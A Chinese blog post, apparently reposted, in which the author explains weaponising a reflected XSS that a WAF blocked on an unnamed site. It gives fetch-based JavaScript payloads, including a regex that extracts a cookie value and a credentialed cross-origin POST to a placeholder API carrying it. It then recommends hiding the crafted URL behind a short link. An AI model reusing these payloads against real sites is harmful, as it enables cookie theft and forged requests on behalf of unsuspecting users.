内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,
偶然间发现某站有个漏洞
因为有WAF不好利用,我之前是不知道能咋利用,
然后大佬说能XSS利用,叫我写个fetch利用,
我?????
试着去学fetch这个东西了
于是有了此文
正文
首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545
大致理解了
然后发出一个fetch的post请求
也就是这个样子
fetch("http://192.168.199.141:3000/api/user/",{
method:'POST',
headers:{
'Content-Type': 'application/json'
},
body:JSON.stringify({
name:'john',
pass:'xioayuan'
})
})
.then((response)=>response.json())
.then((responseJsonData)=>{
alert("请求成功");
console.log(responseJsonData);
})
.catch((error)=>{
alert(error);
})
如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点
假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如
document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')
这样就能提取到key的值了
上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS
var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1');
fetch('https://api.xxxx.com/add', {
method: "POST",
mode: "cors",
credentials: 'include',
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: form
});
直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。
这样一个反射XSS的利用还是蛮有意思的。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- LWN:利用debounce buffer来阻止恶意设备利用DMA窃取信息
- 新医药 Leon Nanodrugs完成1850万欧元A轮融资,利用粒子合成方法提高药物利用率
- JNDI 注入利用工具
- Outlook滥用利用链
- tcache机制利用总结
- LFItoRCE利用总结
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Tango with Django
David Maxwell、Leif Azzopardi / Leanpub / 2016-11-12 / USD 19.00
Tango with Django is a beginner's guide to web development using the Python programming language and the popular Django web framework. The book is written in a clear and friendly style teaching you th......一起来看看 《Tango with Django》 这本书的介绍吧!
